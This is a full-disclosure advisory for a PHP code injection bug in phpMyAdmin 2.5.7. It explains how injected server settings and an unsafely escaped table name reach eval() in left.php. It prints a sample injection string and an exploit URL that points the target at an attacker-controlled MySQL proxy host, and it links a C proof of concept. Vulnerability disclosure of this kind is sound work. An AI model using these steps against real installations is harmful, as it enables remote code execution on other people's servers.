php code injection in phpMyAdmin-2.5.7

Software       : phpMyAdmin
Version	       : 2.5.7
Vendor	       : http://www.phpmyadmin.net/
Vulnerability  : php codes injection  (if $cfg['LeftFrameLight']  set to    FALSE)
Problem-Type   : remote user
phpMyAdmin is web-based mysql administration written in PHP.

There is a vulnerability in phpMyAdmin version 2.5.7.
This vulnerability would allow remote user to inject  php codes 
to be executed by eval() function (in file left.php).
However, This vulnerability only effect if variable $cfg['LeftFrameLight']  
set to    FALSE (in file config.inc.php)

1. Bugs 
 
1.a. Ability to grow up array variables by way of GET params 
PhpMyAdmin has multiple servers configuration stored 
in array variables ($cfg['Servers'][$i]). They  are coded in file config.inc.php. 
They are  usually set at instalation time by owner. 
Each configuration contains mysql server information to be used 
by phpMyAdmin  as host, port, user, password, authentication type, database name etc of mysql server. 
Up to three servers configuration is provided by default.
	
However, Uninitialized $cfg['Servers'][$i]  allows remote user to add server
configuration to the list of servers configuration by growing up 
$cfg['Servers'][$i] array through GET  parameters.

Remote user could add server configuration like this 
http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg;[Servers][4][host]=202.81.x.x&cfg;[Servers][4][port]=8888&cfg;[Servers][4][user]=alice .. and so forth.
The running script will use the fourth server configuration which remote user supply.

1.b. Escape 'magic' quote (') oops
if variable $cfg['LeftFrameLight'] set to FALSE, this part of codes is executed.
      	
$eval_string = '$tablestack[\'' . implode('\'][\'', $_table) . '\'][\'pma_name\'][] = \'' . str_replace('\'', '\\\'', $table) . '\';';
eval($eval_string);
	
$eval_string  will be php codes that executed by function eval().
if we have one table  named 'mytable', $eval_string will have  string value 
$tablestack['']['pma_name'][] = 'mytable';

phpMyAdmin is improper to handle escaping single quote.	
So that  with crafted table name with its name contains meta-chars like this
		 \\';exec(\"touch /tmp/touchable\");/*
$eval_string will  have  value
$tablestack['']['pma_name'][] = '\\';exec("touch /tmp/touchable");/*';
	
In php language, It consists of  three  php statements.
The last statement without trailing comment just give a  warning  message in php.
	 
	
2. Exploite   
Since mysql does not allow table name contain meta-chars, we have to provide a
wrapper of mysql server and acts as a proxy except that it will sends a fake
table name, when client query "SHOW TABLES", by replacing the real table name
with a string contains exploite codes. 

http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg;[Servers][4][host]=attacker.host.com&cfg;[Servers][4][port]=8889&cfg;[Servers][4][auth_type]=config&cfg;[Servers][4][user]=user&cfg;[Servers][4][password]=pass&cfg;[Servers][4][connect_type]=tcp&&cfg;[Servers][4][only_db]=databasename

In attacker.host.com  mysql wrapper will listen  in port 8889 waiting for connection. 

3. Proof of Concept
This mysql wrapper written in c that can be founded in attachment 
or from http://eagle.kecapi.com/sec/codes/phpmy-expt.c 

4. Purpose
This full disclosure is intended to be educational purpose. Nothing else.